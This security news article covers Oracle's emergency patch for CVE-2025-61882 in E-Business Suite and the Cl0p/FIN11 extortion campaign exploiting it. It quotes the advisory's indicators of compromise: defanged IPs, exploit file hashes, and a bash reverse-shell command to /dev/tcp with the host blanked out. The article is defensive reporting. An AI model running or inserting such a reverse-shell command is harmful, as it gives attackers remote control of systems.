Oracle fixed a critical flaw (CVE-2025-61882, CVSS 9.8) in E-Business Suite that is actively exploited by Cl0p cybercrime group.
Oracle released an emergency patch to address a critical vulnerability, tracked as CVE-2025-61882 (CVSS 9.8) in its E-Business Suite.
“Updated [10/04/2025]: Oracle has issued Oracle Security Alert Advisory – CVE-2025-61882 to provide updates against additional potential exploitation that were discovered during our investigation.” reads the alert published by the company. “We strongly recommend Oracle E-Business Suite (EBS) customers apply the guidance provided by this Security Alert as soon as possible.”
The flaw was exploited by the Cl0p ransomware group in data theft attacks. Unauthenticated remote attackers can exploit the flaw to take control of the Oracle Concurrent Processing component.
CVE-2025-61882 affects Oracle E-Business Suite 12.2.3–12.2.14 (BI Publisher Integration), experts warn it is easily exploitable via HTTP.
“This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in remote code execution.” reads the advisory. “Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.”
The advisory also includes the indicators of compromise (IP addresses, observed commands, and files) to allow immediate detection, hunting, and containment:
| Indicator | Type | Description |
|---|---|---|
| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA 256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
Last week, Google Mandiant and Google Threat Intelligence Group (GTIG) researchers reported a suspected Cl0p ransomware group’s activity, where threat actors attempt to extort executives with claims of stealing Oracle E-Business Suite data.
“A group of hackers claimed to have breached Oracle’s E-Business Suite, which runs core operations including financial, supply chain and customer relationship management. In one case, they demanded a ransom of up to $50 million, according to cybersecurity firm Halcyon, which is currently responding to the campaign. The group, which claims to be affiliated with a criminal outfit called Cl0p, has provided proof of compromise to victims including screenshots and file trees.” reported Bloomberg.
“At least one company has confirmed that data from their Oracle systems has been stolen, according to one of the people.”
Attackers likely hacked user emails and exploited Oracle E-Business Suite’s default password reset to steal valid credentials, reported cybersecurity firm Halycon.
“We have seen Cl0p demand huge seven- and eight-figure ransoms in the last few days,” said Cynthia Kaiser, vice president at Halcyon’s ransomware research center. “This group is notorious for stealthy, mass data theft that heightens their leverage in ransom negotiations.”
“This activity began on or before September 29, 2025, but Mandiant’s experts are still in the early stages of multiple investigations, and have not yet substantiated the claims made by this group,” said Genevieve Stark, Head of Cybercrime and Information Operations Intelligence Analysis at GTIG.
Stark said an email in the extortion notes ties to a Cl0p affiliate and includes Cl0p site contacts, but Google lacks proof to confirm the attackers’ claims.
Mandiant’s CTO Charles Carmakal said attackers use hundreds of hacked accounts in a mass extortion campaign. At least one account links to the financially motivated hacker group FIN11.
Since August 2020, FIN11 has been targeting organizations in many industries, including defense, energy, finance, healthcare, legal, pharmaceutical, telecommunications, technology, and transportation. The extortion group was observed deploying the Clop ransomware into the networks of its victims.
The researchers believe FIN11 operates from the Commonwealth of Independent States (CIS – former Soviet Union countries). In 2020, Mandiant experts observed Russian-language file metadata in the code of the malware and reported that the Clop ransomware was only deployed on machines with a keyboard layout used outside CIS countries.
At the time, researchers from FireEye’s Mandiant observed FIN11 hackers using spear-phishing messages to distribute a malware downloader dubbed FRIENDSPEAK.
“The malicious emails contain contact information, and we’ve verified that the two specific contact addresses provided are also publicly listed on the Cl0p data leak site (DLS),” Carmakal added. “This move strongly suggests there’s some association with Cl0p, and they are leveraging the brand recognition for their current operation.”
Halcyon, citing people familiar with the matter, revealed they believed threat actors exploited a vulnerability in Oracle’s E-Business Suite.
Mandiant researchers recommend investigating their environment for indicators of compromise associated with Cl0p operation.
Cl0p has launched major attacks in recent years, exploiting zero-day flaws in popular software such as Accellion, SolarWinds, Fortra GoAnywhere, and MOVEit.
Follow me on Twitter: @securityaffairs and Facebook and Mastodon
(SecurityAffairs – hacking, newsletter)
